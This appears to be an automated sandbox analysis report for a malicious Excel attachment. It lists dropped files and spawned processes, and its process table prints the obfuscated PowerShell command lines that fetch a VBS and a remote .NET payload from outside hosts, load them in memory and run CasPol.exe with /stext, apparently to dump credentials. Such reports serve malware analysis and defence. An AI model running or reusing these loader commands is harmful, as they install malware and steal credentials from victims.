Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
A & C Metrology OC 545714677889Materiale.xls
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Oct 30 17:50:53 2024, Security: 1
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ernashgetmebackwithgoodnewswhichgrreatthings[1].hta
|
HTML document, ASCII text, with very long lines (65536), with no line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\Desktop\A & C Metrology OC 545714677889Materiale.xls (copy)
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\picturewithgreatnewswithgoodthingsonbestplace[1].tiff
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\json[1].json
|
JSON data
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\180B9CB3.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\368CC4FA.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3D9573FB.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4AA02F62.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4FE5C0.emf
|
Windows Enhanced Metafile (EMF) image data version 0x10000
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1py0mh1i.eyz.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1vaxlmbz.scv.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\24gpjrna.isx.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\2zk1p2gc.epx.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\4txanzkw.1kp.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\5h3o10cv.cdk.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RES7A10.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:03 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\RESC85F.tmp
|
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Thu Oct 31 04:14:23 2024,
1st section name ".debug$S"
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\aboyzkdo.yf1.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv2DF4.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\bhv417.tmp
|
Extensible storage engine DataBase, version 0x620, checksum 0x03840a1c, page size 32768, DirtyShutdown, Windows version 6.1
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\fds3zcto.zzs.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\l3vldqo2.q3p.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\legehkn5.guh.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\ooofmq3d.gjy.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\owwdnwiorrwlyboscy
|
Unicode text, UTF-16, little-endian text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\revod450\CSCA06B8A6F8CBF4D28B1CF456BD67905.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\revod450\revod450.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline
|
Unicode text, UTF-8 (with BOM) text, with very long lines (366), with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\revod450\revod450.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\revod450\revod450.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\ro2x0ujm.yqd.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\tcqnvyec.bvj.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\u3qqruit.gii.psm1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\v4pa1vwr.u0p.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\wjfjxygv.fk5.ps1
|
very short file (no magic)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xcygtrxb\CSC209022CC148748BB8468879EDEB89E99.TMP
|
MSVC .res
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.0.cs
|
C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (347)
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.dll
|
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.out
|
Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\~DF461EF3F8D7EFD076.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF523C1B826206368A.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DF5E72911EE0F8EE5F.TMP
|
data
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\~DFE74F55484018A372.TMP
|
Composite Document File V2 Document, Cannot read section info
|
dropped
|
||
C:\Users\user\Desktop\7B130000
|
Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application:
Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Thu Oct 31 04:14:13 2024, Security: 1
|
dropped
|
||
C:\Users\user\Desktop\7B130000:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 41 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
|
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex
ByPAss -noP -W 1
-C dEvIcECreDEnTIaldEpLOYMent.EXE ;
IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xcygtrxb\xcygtrxb.cmdline"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur
QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText
= [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex
= ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex
-gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command
= ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray()
KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly
= [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull,
@(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx,
QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
|
||
C:\Windows\System32\mshta.exe
|
C:\Windows\System32\mshta.exe -Embedding
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\SYStEM32\windOWSpOWErsHeLL\V1.0\PoWERShelL.exe" "PoweRshElL.EXe -Ex
ByPAss -noP -W 1
-C dEvIcECreDEnTIaldEpLOYMent.EXE ;
IeX($(Iex('[SYSTem.texT.enCoDIng]'+[chAR]0X3a+[cHAR]58+'UTf8.gETsTRInG([sYSTEM.CONverT]'+[cHAr]0x3a+[Char]58+'fRoMBASe64STrIng('+[cHaR]34+'JFhETklVVk0yVTJQICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FbUJFcmRlRmlOSVRJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgd0xBYWd3b3csc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgbixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHUmosdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGd3cCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBxdlcpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJiZUtsQXF0QWEiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHB1TlFCdkdFdSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkWEROSVVWTTJVMlA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTc0LjE0Ni40Ni81Ny9waWN0dXJld2l0aGdyZWF0bmV3c3dpdGhnb29kdGhpbmdzb25iZXN0cGxhY2UudElGIiwiJEVuVjpBUFBEQVRBXHBpY3R1cmV3aXRoZ3JlYXRuZXdzd2l0aGdvb2R0aGluZ3NvbmJlLnZicyIsMCwwKTtTVEFydC1zbGVlcCgzKTtTdGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFccGljdHVyZXdpdGhncmVhdG5ld3N3aXRoZ29vZHRoaW5nc29uYmUudmJzIg=='+[chAr]34+'))')))"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex ByPAss -noP -W 1 -C dEvIcECreDEnTIaldEpLOYMent.EXE
|
||
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
|
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\revod450\revod450.cmdline"
|
||
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithgreatnewswithgoodthingsonbe.vbs"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSG9NRVsyMV0rJFBzaE9tRVszMF0rJ3gnKSgoJ1prYWltYWdlVXJsID0gUUN4aHQnKyd0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjYnKyd2UzRzVU95Ym5ILXNEdlVoQll3dXIgUUN4O1prYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7WmthaW1hZ2VCJysneXRlcyA9IFprYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoWmthaW1hZ2VVcmwpO1prYWltYWdlVGV4dCA9IFtTeXN0JysnZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFprYWltYWdlQnl0ZXMpO1prYXN0YXJ0RmxhZyA9IFFDeDwnKyc8QkFTRTY0X1NUQVJUPj5RQ3g7WmthZW5kRmxhZyA9IFFDeDw8QkFTRTY0X0VORD4+UUN4O1prYXN0YXJ0SW5kZXggPSBaa2FpbWFnZVRleHQuSW5kZXhPZihaa2FzdGFydEZsYWcpO1prYWVuZEluZGV4ID0gWmthaW1hZ2VUZXh0LkluZGV4T2YoWmthZW5kRmxhZycrJyk7Wmthc3RhcnRJbmRleCAtZ2UgMCAtYW4nKydkIFprYWVuZEluZGV4IC1ndCBaJysna2FzdCcrJ2FydEluZGV4O1prYXN0YXJ0SW4nKydkZXggKz0gWmthc3RhcnRGbGFnLkxlbmd0aDtaa2FiYXNlNjRMZW5ndGgnKycgPSBaa2FlbmRJbmRleCAtIFprYXN0YXJ0SW5kZXg7WmthYmFzZTY0Q29tbWFuZCA9IFprYWltYWdlVGV4dC5TdWJzdHJpbicrJ2coWmthc3RhcnRJbmRleCwgJysnWmthYmFzJysnZTY0TGVuZ3RoKTtaa2FiYXNlNjRSZXZlcnNlZCA9IC1qb2luIChaa2FiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgS041IEZvckVhY2gtT2JqZWN0IHsgWmsnKydhXyB9KVstMS4uLShaa2FiJysnYXMnKydlNjRDb21tYW5kLkxlbmd0aCldO1prYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uJysnQ29udmVydF06OkZyb21CYXNlJysnNjRTdHJpbmcoWmthYmFzZTY0UmV2ZXJzZWQpO1prYWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZChaa2Fjb21tYScrJ25kQnl0ZXMpO1prYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZScrJ3RNZXRob2QoUUN4VkFJUUN4KTtaa2F2YWlNZXRob2QuSW52b2tlKFprYW51bGwsIEAoUUN4dHh0LlJSRlZHR0ZSLzc1LzY0LjY0MS40NzEuNzAxLy86cHR0aFFDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUMnKyd4ZGVzYXRpdmFkb1FDeCwgUUN4ZGVzYXRpdmFkb1FDeCwgUUN4Q2FzJysnUG9sUUN4LCBRQ3hkZXNhdGl2YWRvUScrJ0N4LCBRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3hkZXNhdGl2YWRvUUN4LFFDeGRlc2F0aXZhZG9RQ3gsUUN4ZGVzYXRpdmFkb1FDeCxRQ3gxUUN4LFFDeGRlc2F0aXZhZG9RQ3gpKTsnKS5yRVBMYUNlKChbY0hhUl05MCtbY0hhUl0xMDcrW2NIYVJdOTcpLFtzVHJJbmddW2NIYVJdMzYpLnJFUExhQ2UoJ0tONScsW3NUckluZ11bY0hhUl0xMjQpLnJFUExhQ2UoKFtjSGFSXTgxK1tjSGFSXTY3K1tjSGFSXTEyMCksW3NUckluZ11bY0hhUl0zOSkp';$OWjuxd
= [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy
bypass -NoProfile -command $OWjuxD
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command
".( $psHoME[21]+$PshOmE[30]+'x')(('ZkaimageUrl = QCxht'+'tps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur
QCx;ZkawebClient = New-Object Sy'+'stem.Net.WebClient;ZkaimageB'+'ytes = ZkawebClient.DownloadData(ZkaimageUrl);ZkaimageText
= [Syst'+'em.Text.Encoding]::UTF8.GetString(ZkaimageBytes);ZkastartFlag = QCx<'+'<BASE64_START>>QCx;ZkaendFlag = QCx<<BASE64_END>>QCx;ZkastartIndex
= ZkaimageText.IndexOf(ZkastartFlag);ZkaendIndex = ZkaimageText.IndexOf(ZkaendFlag'+');ZkastartIndex -ge 0 -an'+'d ZkaendIndex
-gt Z'+'kast'+'artIndex;ZkastartIn'+'dex += ZkastartFlag.Length;Zkabase64Length'+' = ZkaendIndex - ZkastartIndex;Zkabase64Command
= ZkaimageText.Substrin'+'g(ZkastartIndex, '+'Zkabas'+'e64Length);Zkabase64Reversed = -join (Zkabase64Command.ToCharArray()
KN5 ForEach-Object { Zk'+'a_ })[-1..-(Zkab'+'as'+'e64Command.Length)];ZkacommandBytes = [System.'+'Convert]::FromBase'+'64String(Zkabase64Reversed);ZkaloadedAssembly
= [System.Reflection.Assembly]::Load(Zkacomma'+'ndBytes);ZkavaiMethod = [dnlib.IO.Home].Ge'+'tMethod(QCxVAIQCx);ZkavaiMethod.Invoke(Zkanull,
@(QCxtxt.RRFVGGFR/75/64.641.471.701//:ptthQCx, QCxdesativadoQCx, QC'+'xdesativadoQCx, QCxdesativadoQCx, QCxCas'+'PolQCx, QCxdesativadoQ'+'Cx,
QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCxdesativadoQCx,QCx1QCx,QCxdesativadoQCx));').rEPLaCe(([cHaR]90+[cHaR]107+[cHaR]97),[sTrIng][cHaR]36).rEPLaCe('KN5',[sTrIng][cHaR]124).rEPLaCe(([cHaR]81+[cHaR]67+[cHaR]120),[sTrIng][cHaR]39))"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ccpqkvncszlcdyhupbgkfnqpbhfycgj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\ewuj"
|
||
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
|
